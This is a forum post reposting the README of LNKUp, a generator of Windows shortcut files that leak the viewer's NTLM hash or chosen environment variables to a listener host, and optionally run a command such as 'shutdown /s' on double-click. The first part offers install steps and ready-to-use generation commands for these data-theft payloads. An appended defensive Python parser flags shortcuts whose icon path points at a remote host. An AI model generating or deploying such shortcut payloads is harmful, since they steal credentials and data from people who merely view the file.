Nytro
Posted August 16, 2017

LNKUp

LNK Data exfiltration payload generator

This tool will allow you to generate LNK payloads. Upon rendering or being run, they will exfiltrate data.

Info

I am not responsible for any actions you take with this tool! You can contact me with any questions by opening an issue, or via my Twitter, @Plazmaz.

Known gotchas

This tool will not work on OSX or Linux machines. It is specifically designed to target Windows.
There may be issues with icon caching in some situations. If your payload doesn't execute after the first time, try regenerating it.
You will need to run a responder or metasploit module server to capture NTLM hashes.
To capture environment variables, you'll need to run a webserver like apache, nginx, or even just this

Installation

Install requirements using

    pip install -r requirements.txt

Usage

Payload types:

NTLM
Steals the user's NTLM hash when rendered.
Needs listener server such as this metasploit module
More on NTLM hashes leaking: https://dylankatz.com/NTLM-Hashes-Microsoft's-Ancient-Design-Flaw/
Example usage:

    lnkup.py --host localhost --type ntlm --output out.lnk

Environment
Steals the user's environment variables.
Examples: %PATH%, %USERNAME%, etc
Requires variables to be set using --vars
Example usage:

    lnkup.py --host localhost --type environment --vars PATH USERNAME JAVA_HOME --output out.lnk

Extra:
Use --execute to specify a command to run when the shortcut is double clicked
Example:

    lnkup.py --host localhost --type ntlm --output out.lnk --execute "shutdown /s"

Source: https://github.com/Plazmaz/LNKUp
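For triaging shortcuts against the NTLM and environment payload types described in the post above, this added example (not part of the original post or the LNKUp project) parses a .lnk file's MS-SHLLINK string data and flags an icon location that points at another host. It assumes the leak rides on the shortcut's icon path, which the post implies with "when rendered" but does not state; `host.example` and the sample shortcuts are constructed.

```python
import re
import struct

# MS-SHLLINK constants: 76-byte header, fixed CLSID, LinkFlags at offset 20.
CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FLAGS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                (0x20, "arguments"), (0x40, "icon_location")]
ENV_REF = re.compile(r"%[^%\\/]+%")

def parse_lnk_strings(data):
    """Return the StringData fields present in a .lnk file's bytes."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    try:
        if flags & HAS_IDLIST:      # IDListSize (2 bytes) + IDList
            off += 2 + struct.unpack_from("<H", data, off)[0]
        if flags & HAS_LINKINFO:    # LinkInfoSize counts its own 4 bytes
            off += struct.unpack_from("<I", data, off)[0]
        width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
        fields = {}
        for bit, name in STRING_FLAGS:  # fields appear in this fixed order
            if flags & bit:
                size = struct.unpack_from("<H", data, off)[0] * width
                raw = data[off + 2:off + 2 + size]
                if len(raw) != size:
                    raise ValueError("truncated string data")
                fields[name] = raw.decode(codec, errors="replace")
                off += 2 + size
    except struct.error:
        raise ValueError("truncated shell link") from None
    return fields

def remote_icon_findings(data):
    """Flag an icon location that makes Explorer reach out to another host."""
    icon = parse_lnk_strings(data).get("icon_location", "")
    found = []
    if icon.startswith("\\\\") or re.match(r"(?i)https?://", icon):
        found.append("icon fetched from remote host")
        if ENV_REF.search(icon):
            found.append("environment variable expanded into remote path")
    return found

def constructed_sample(icon, unicode=True):
    """Constructed fixture: header plus ICON_LOCATION only, kept in memory."""
    flags = 0x40 | (IS_UNICODE if unicode else 0)
    body = icon.encode("utf-16-le" if unicode else "cp1252")
    return (b"\x4c\x00\x00\x00" + CLSID + struct.pack("<I", flags) + bytes(52)
            + struct.pack("<H", len(icon)) + body)
```

A local icon path that uses an environment variable, such as `%SystemRoot%\system32\shell32.dll`, is common in legitimate shortcuts and is deliberately not flagged.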